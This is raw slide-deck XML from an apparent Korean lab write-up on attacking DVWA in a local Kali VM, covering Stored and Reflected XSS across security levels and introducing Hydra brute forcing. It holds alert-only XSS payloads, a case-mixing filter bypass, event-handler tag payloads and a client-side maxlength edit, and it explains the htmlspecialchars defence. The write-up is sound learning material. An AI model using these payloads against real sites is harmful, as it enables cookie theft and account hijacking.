            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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entity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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치환하면 브라우저가 자체적으로  렌더링하여 특수문자로 보여지지만 스크립트가 실행되지 않는 것을 확인할 수 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" b="0" i="0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b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br>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" dirty="0"/>
            </a:b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98377D-1CE5-4FF2-88D0-3DB1723080E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="483805" y="3735283"/>
            <a:ext cx="2164109" cy="2584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EA1F93E-36ED-4F12-9CD3-BE57BCC57DD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="554207" y="3275665"/>
            <a:ext cx="3770107" cy="2584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B742EBA8-DDE6-48EB-8E23-6AE120A47E80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1">
            <a:off x="4445973" y="3220210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E7644C-C7C2-4CBA-BE38-B7B3330CCF5A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4567632" y="3433696"/>
            <a:ext cx="3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3B69"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="213B69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08294F5A-CF59-4C9F-99C3-3BD700064C1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="2159973" y="4061672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0A3E1-F039-4F33-ABB2-915F9E8DC975}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2399432" y="4194901"/>
            <a:ext cx="33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13B69"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="213B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20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6C5898-8357-4C26-8A5A-064F4672E94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94FB019-8F79-4C25-89D9-4E6888C5E8CB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E22650C1-1F7F-4CA1-9AE7-F3739B437E13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813" y="3048507"/>
            <a:ext cx="4485405" cy="1352903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4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Brute Force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46AB0-0C28-4D7C-8C3B-D67E479EA7AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="161984" y="3309457"/>
            <a:ext cx="2193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</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="6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66684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311157" y="59497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80518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Impossible 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레벨 공격 결과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390525" y="177163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9BF62167-608F-46D6-AF61-24954B32DB76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="312739" y="3513949"/>
            <a:ext cx="6120154" cy="1636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558B6-1547-4666-88D0-4CDB8C019A09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-422625" y="3207494"/>
            <a:ext cx="6120154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en-US" altLang="ko-KR" sz="15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5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=x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="15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=alert(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="15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);&gt;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C73856-44DF-42E1-BE45-99AB6F120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1989427"/>
            <a:ext cx="6004620" cy="13111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C43B309-A046-46E2-9E4E-46E67F086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85" y="3788342"/>
            <a:ext cx="5983634" cy="13969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95E82E-1F0A-427B-8196-8F994379652F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472381" y="5146151"/>
            <a:ext cx="6120154" cy="751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&lt;IFRAME SRC=#onmouseover=“ alert(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="15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)”&gt; &lt;/IFRAME&gt;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3E5C6AE-A4D8-4730-BE10-35BBC2E5D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9" b="-1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="392107" y="5935330"/>
            <a:ext cx="5983634" cy="12629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42EBE8-012E-4A1F-B222-FD80F25BD2B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="485424" y="7235916"/>
            <a:ext cx="6120154" cy="40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&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="15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onmouseover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=“alert(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="15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)”\&gt;ATTACK!!!\&lt;/a\&gt;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8679C4-A06E-447B-A49A-25A92F1352E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4740763" y="6451705"/>
            <a:ext cx="165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[A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태그사용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27925B68-407A-4F5C-8E2F-EC1D139ED4D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1">
            <a:off x="4389630" y="6451706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B81296-82FB-4527-8734-9D7D523242B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4708669" y="2559812"/>
            <a:ext cx="1655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en-US" altLang="ko-KR" dirty="0" err="1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태그사용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화살표: 아래쪽 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9150EBB5-CD3A-41CF-A1F4-8491CE732060}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1">
            <a:off x="4334077" y="2545959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8D25FA-0A0A-4BD7-8A05-802BADCD215B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4639915" y="4379077"/>
            <a:ext cx="2112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[IFRAME </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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태그사용</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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endParaRPr lang="ko-KR" altLang="en-US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BFEC7ED0-1A5E-46D7-942B-B71134D691C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipH="1">
            <a:off x="4315021" y="4381352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AF7DF3-6FF8-4C94-95D9-6D7F4A88F0AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="573087" y="7714664"/>
            <a:ext cx="5599458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, medium, high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레벨에서 사용한 공격을 시도한 결과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웹 브라우저에서의 명령어는 출력되었지만 자바 스크립트가 실행되지 않은 결과를 확인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5524263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312739" y="581119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80518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Impossible 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레벨 공격 결과</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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390525" y="177163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3-1) XSS(Reflected)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9BF62167-608F-46D6-AF61-24954B32DB76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="312739" y="3513949"/>
            <a:ext cx="6120154" cy="16363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8558B6-1547-4666-88D0-4CDB8C019A09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472381" y="6174094"/>
            <a:ext cx="6120154" cy="2937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altLang="ko-KR" sz="17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  &amp;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lt;img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=x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=alert(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);&amp;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gt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출력된 것을 확인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 값이 출력된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 코드를 보면 부등호와 큰따옴표를 모두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엔티티로 변환하여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삽입을 차단한 것을 확인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XSS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공격을 제대로 방어 한 것을  확인 할 수 있다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1E9A0B1-A7CE-4CDA-9F79-98A8C9C68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07" y="1964031"/>
            <a:ext cx="6004619" cy="401766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11E8B77-C23F-47E2-8D64-D49B72F63A9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1156941" y="4704464"/>
            <a:ext cx="3738909" cy="21554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C0F6BAF4-B068-4EF0-AF13-51F063E668A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="490579" y="7077697"/>
            <a:ext cx="332935" cy="369331"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 36751"/>
              <a:gd name="adj2" fmla="val 47456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19E6D2-0A0A-4B9A-BB9F-F628B7193691}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="491077" y="6377057"/>
            <a:ext cx="626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=x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=alert(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);&gt;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결과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0517701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BD7F47-16F7-4569-8C42-5711FB9D9072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59AB7B9-E1ED-4F4B-95C9-1998008A349C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A1466FD8-DB7A-4F65-99CD-09D1490A87C0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제목 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FDDD98AD-CF73-44C3-8A21-F94D383CDF9F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1827803" y="3033775"/>
            <a:ext cx="5472234" cy="135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     XSS(Stored)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1B5F9-C014-48C5-8332-33A05F414C68}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-127000" y="3309457"/>
            <a:ext cx="23581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50361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개요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(Cross-Site Scripting)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읽는 것이 맞지만 이미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Cascading Style Sheets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약자로 사용되고 있어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게시판이나 웹 메일 등에 스크립트 코드를 삽입해 개발자가 고려하지 않은 기능이 작동하게 하는 공격이다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공격은 크게 세 가지로 분류하는데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이번에 소개할 공격은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Stored XSS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게시판에 스크립트를 삽입하는 공격방식이다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서버의 저장소에 저장된 상태로 동작하기 때문에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Stored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불린다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일반적으로 무작위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클릭하는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클라이언트의 쿠키탈취를 목적으로 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XSS (Cross-Site Scripting) – Overview and Contexts | SAP Blogs">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7FA36A0-1A74-4D41-87E6-47C2D1DD51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 bwMode="auto">
          <a:xfrm>
            <a:off x="473075" y="1968500"/>
            <a:ext cx="59118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27940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실습 환경 설정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공격을 진행하기전에 실습할 환경을 설정한다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통해 진행하며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~ Impossible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난이도까지 차례대로 살펴본다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가상머신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VMWare 15.5.6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운영체제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Kali Linux 2.6.32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호스트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PC : Windows 10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방화벽 및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SELINUX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설정은 전부 해제하고 진행했다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Are VMware Workstation &amp; Fusion Dead? | Aidan Finn, IT Pro">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B63733B-E037-448E-87B8-51FCEBE3C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49" y="3460748"/>
            <a:ext cx="27051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crosoft Windows 10 IoT Enterprise LTSB (Intel Core i7/Xeon) - Sealevel">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96531C0B-B463-4A16-A24E-9F3275556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185" y="195921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WS Marketplace: Kali Linux">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A25B4A44-1DC9-447F-A131-8806430F3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0" y="1959211"/>
            <a:ext cx="2047875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0357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  <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://localhost/dvwa/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접속한다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왼쪽 아래에 있는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Security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low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난이도를 설정한다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 왼쪽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탭중에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(Stored)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위와 같은 화면을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입력값을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테스트 값으로 입력해보면 아래 쪽에 내용이 출력된다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상태에서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취약점을 이용한 공격을 실시한다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XSS (Cross-Site Scripting) – Overview and Contexts | SAP Blogs">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7FA36A0-1A74-4D41-87E6-47C2D1DD51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 bwMode="auto">
          <a:xfrm>
            <a:off x="473075" y="1968500"/>
            <a:ext cx="59118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91EBC-7407-4140-89DA-B40667C7FDA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3725" y="1991997"/>
            <a:ext cx="5911200" cy="31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91052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4778E117-93A4-4C0C-B08E-5AD9E9575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204" y="5502146"/>
            <a:ext cx="5902671" cy="2262187"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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9BCA09E0-4278-411C-9A24-18190839E957}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="466205" y="3611607"/>
            <a:ext cx="5902671" cy="10984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기본적으로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취약점을 알아보려면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게시판의 제목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 등 입력 값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(Text)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입력할 수 있는 부분에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&lt;script&gt;alert(1)&lt;/script&gt;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입력해본다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위와 같은 메시지가 출력된다면 그 서버는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취약점이 존재하는 것이다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80A9F708-B98F-4949-AA86-BF75D5B4390A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="466204" y="8152584"/>
            <a:ext cx="5902671" cy="109846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점을 악용하여 본문에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&lt;script&gt;alert(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)&lt;/script&gt;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내용을 입력하고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Sign Guestbook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누르면 다음의 쿠키내용을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AD6C677-F007-458D-97D4-0A7AD0517E4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68846" y="1010411"/>
            <a:ext cx="5920308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838798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 Request Message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확인해본다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(Wireshark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다른 패킷 분석도구 사용가능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Cookie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확인할 수 있는데 앞의 스크립트 공격을 실제로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하게되면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자신이 아닌 공격당한 클라이언트의 쿠키 값을 출력해주게 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앞으로 공격을 한 단계씩 끝낼 때마다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Clear Guestbook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데이터베이스를 초기화해준다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XSS (Cross-Site Scripting) – Overview and Contexts | SAP Blogs">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7FA36A0-1A74-4D41-87E6-47C2D1DD51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 bwMode="auto">
          <a:xfrm>
            <a:off x="473075" y="1968500"/>
            <a:ext cx="59118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91EBC-7407-4140-89DA-B40667C7FD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3725" y="1991997"/>
            <a:ext cx="5911200" cy="318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305CE5-AF65-4A74-A027-06F7AF044E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1991997"/>
            <a:ext cx="5911200" cy="318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31045-DAC1-43E9-A296-A3FF75E53186}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="663389" y="4649462"/>
            <a:ext cx="3227293" cy="270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27679-0F13-488D-9BC5-7826121B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420" y="2699596"/>
            <a:ext cx="4343400" cy="1733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D065D-62BD-4918-86DB-2D2CE8BE1809}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2033959" y="3050524"/>
            <a:ext cx="3990323" cy="22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0205687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이번엔 이전과 같은 방법으로 난이도를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다음 취약점을 확인하기 위해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&lt;script&gt;alert(1)&lt;/script&gt;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본문에 입력해본다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경고 메시지가 뜨지않고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alert(1)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이라는 값이 게시판에 올라간 것을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서버 쪽 코드 내에서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&lt;script&gt;&lt;/script&gt;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부분을 처리해준 것 같다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DVWA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소스코드를 제공해주기 때문에 페이지 오른쪽 아래에 있는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Source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클릭한다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XSS (Cross-Site Scripting) – Overview and Contexts | SAP Blogs">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7FA36A0-1A74-4D41-87E6-47C2D1DD51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 bwMode="auto">
          <a:xfrm>
            <a:off x="473075" y="1968500"/>
            <a:ext cx="59118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91EBC-7407-4140-89DA-B40667C7FD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3725" y="1991997"/>
            <a:ext cx="5911200" cy="318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305CE5-AF65-4A74-A027-06F7AF044E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1991997"/>
            <a:ext cx="5911200" cy="318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31045-DAC1-43E9-A296-A3FF75E53186}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="663389" y="4649462"/>
            <a:ext cx="3227293" cy="270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27679-0F13-488D-9BC5-7826121B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420" y="2699596"/>
            <a:ext cx="4343400" cy="1733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D065D-62BD-4918-86DB-2D2CE8BE1809}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2033959" y="3050524"/>
            <a:ext cx="3990323" cy="22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80DC0-3616-47D2-94A1-8868E135E5F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2959" y="1979299"/>
            <a:ext cx="5911200" cy="31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90976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$message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는 본문의 내용을 담고있는 변수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$name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제목의 내용을 담고있는 변수라는 것이 보인다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본문의 내용을 처리하는 부분을 확인한다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(8~12 line)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$message =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htmlspecialchars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 $message )</a:t>
            </a:r>
          </a:p>
          <a:p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htmlspecialchars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&lt;, ?, $, “, ‘, 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특수문자들을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엔티티로 변환해주는 함수이다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(&lt; = &amp;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lt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ltscript&amp;gt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바꿔주기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때문에 본문에는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아까의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공격코드를 사용할 수 없다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바로 아래의 제목의 내용을 처리하는 부분을 확인한다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XSS (Cross-Site Scripting) – Overview and Contexts | SAP Blogs">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7FA36A0-1A74-4D41-87E6-47C2D1DD51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 bwMode="auto">
          <a:xfrm>
            <a:off x="473075" y="1968500"/>
            <a:ext cx="59118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91EBC-7407-4140-89DA-B40667C7FD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3725" y="1991997"/>
            <a:ext cx="5911200" cy="318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305CE5-AF65-4A74-A027-06F7AF044E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1991997"/>
            <a:ext cx="5911200" cy="318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31045-DAC1-43E9-A296-A3FF75E53186}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="663389" y="4649462"/>
            <a:ext cx="3227293" cy="270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27679-0F13-488D-9BC5-7826121B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420" y="2699596"/>
            <a:ext cx="4343400" cy="1733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D065D-62BD-4918-86DB-2D2CE8BE1809}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2033959" y="3050524"/>
            <a:ext cx="3990323" cy="22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80DC0-3616-47D2-94A1-8868E135E5F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2959" y="1979299"/>
            <a:ext cx="5911200" cy="318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1D81C0-9973-47EE-AD7F-368A6987451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0883" y="1979299"/>
            <a:ext cx="5911200" cy="318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233F2-EF82-49A0-9DC9-3E45EA62B685}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="507633" y="3348377"/>
            <a:ext cx="1841868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2612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개요</a:t>
            </a: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개요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무차별 대입 공격은 특정한 암호를 풀기 위해 가능한 모든 값을 대입하는  것이다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이와 함께 비슷한 공격방식인 사전에 있는 단어를 입력하여 암호를 알아내거나 해독하는  사전공격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(Dictionary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Attack)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 함께 진행한다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환경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Kali-Linux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(Security Level: Low ~ Impossible)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대상으로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툴과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Hydra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툴을 활용하여 진행한다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외 기타 환경은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동일하다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3E710F-ED86-4DC2-8F59-E3B290607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81" y="4226515"/>
            <a:ext cx="6227837" cy="176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34376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$name =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str_replace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(‘&lt;script&gt;’, ‘ ‘, $name);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/* $name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제목의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내용중에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‘&lt;script&gt;’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라는 문자열이 있다면 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‘ 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공백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치환한다는 내용이다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*/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&lt;script&gt;&lt;/script&gt;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사라지고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alert(1)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남게된다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그렇다면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&lt;SCRIPT&gt;, &lt;Script&gt;, &lt;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&gt;, &lt;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대문자를 섞는다면 소스코드에서 걸러지지 않을 것이다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답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&lt;Script&gt;alert(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)&lt;/Script&gt;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내용에 답을 입력하면 클릭할 때마다 다시 쿠키의 값이 출력된다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XSS (Cross-Site Scripting) – Overview and Contexts | SAP Blogs">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7FA36A0-1A74-4D41-87E6-47C2D1DD51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 bwMode="auto">
          <a:xfrm>
            <a:off x="473075" y="1968500"/>
            <a:ext cx="59118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91EBC-7407-4140-89DA-B40667C7FD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3725" y="1991997"/>
            <a:ext cx="5911200" cy="318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305CE5-AF65-4A74-A027-06F7AF044E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1991997"/>
            <a:ext cx="5911200" cy="318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31045-DAC1-43E9-A296-A3FF75E53186}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="663389" y="4649462"/>
            <a:ext cx="3227293" cy="270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27679-0F13-488D-9BC5-7826121B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420" y="2699596"/>
            <a:ext cx="4343400" cy="1733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D065D-62BD-4918-86DB-2D2CE8BE1809}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2033959" y="3050524"/>
            <a:ext cx="3990323" cy="22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80DC0-3616-47D2-94A1-8868E135E5F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2959" y="1979299"/>
            <a:ext cx="5911200" cy="318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1D81C0-9973-47EE-AD7F-368A6987451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0883" y="1979299"/>
            <a:ext cx="5911200" cy="318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233F2-EF82-49A0-9DC9-3E45EA62B685}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="507633" y="3348377"/>
            <a:ext cx="1841868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5414641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아마 제목부분에 공격코드가 다 들어가지 않을 것이다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개발자모드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(F12)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연다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[Ctrl + Shift + C]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키를 동시에 누르고 제목 부분을 클릭한다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사진과 같이 아래쪽에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html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태그가 보인다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maxlength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=“10”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“100”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으로 변경한다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(Enter)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다음에 다시 값을 입력하면 글자수 제한이 변경되어서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전부 들어가는 것을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BA31045-DAC1-43E9-A296-A3FF75E53186}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="663389" y="4649462"/>
            <a:ext cx="3227293" cy="270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6D065D-62BD-4918-86DB-2D2CE8BE1809}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2033959" y="3050524"/>
            <a:ext cx="3990323" cy="22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233F2-EF82-49A0-9DC9-3E45EA62B685}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="507633" y="3348377"/>
            <a:ext cx="1841868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AD818E3-2AE4-400A-BB16-6A59C16FB1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74418" y="1926489"/>
            <a:ext cx="5911200" cy="318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BAB9E3C-0EA9-4C60-A67C-3A8071E05C82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2922494" y="2554268"/>
            <a:ext cx="2312894" cy="1812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579618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이번엔 난이도를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올린다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같은 방법으로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사용했던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&lt;Script&gt;alert(1)&lt;/Script&gt;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제목에 입력해보면 이번엔 전부 걸러져서 제목엔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‘&gt;’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만 저장된 것을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다시 한번 소스코드를 확인한다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XSS (Cross-Site Scripting) – Overview and Contexts | SAP Blogs">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7FA36A0-1A74-4D41-87E6-47C2D1DD51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 bwMode="auto">
          <a:xfrm>
            <a:off x="473075" y="1968500"/>
            <a:ext cx="59118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91EBC-7407-4140-89DA-B40667C7FD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3725" y="1991997"/>
            <a:ext cx="5911200" cy="318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305CE5-AF65-4A74-A027-06F7AF044E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1991997"/>
            <a:ext cx="5911200" cy="318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31045-DAC1-43E9-A296-A3FF75E53186}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="663389" y="4649462"/>
            <a:ext cx="3227293" cy="270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27679-0F13-488D-9BC5-7826121B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420" y="2699596"/>
            <a:ext cx="4343400" cy="1733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D065D-62BD-4918-86DB-2D2CE8BE1809}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2033959" y="3050524"/>
            <a:ext cx="3990323" cy="22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80DC0-3616-47D2-94A1-8868E135E5F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2959" y="1979299"/>
            <a:ext cx="5911200" cy="318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1D81C0-9973-47EE-AD7F-368A6987451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0883" y="1979299"/>
            <a:ext cx="5911200" cy="318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233F2-EF82-49A0-9DC9-3E45EA62B685}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="507633" y="3348377"/>
            <a:ext cx="1841868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6F301A-A474-428E-8A4D-FC49293C944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67670" y="1947766"/>
            <a:ext cx="5911200" cy="318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BAC983-931D-45A7-B998-5609C820317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26691" y="1932273"/>
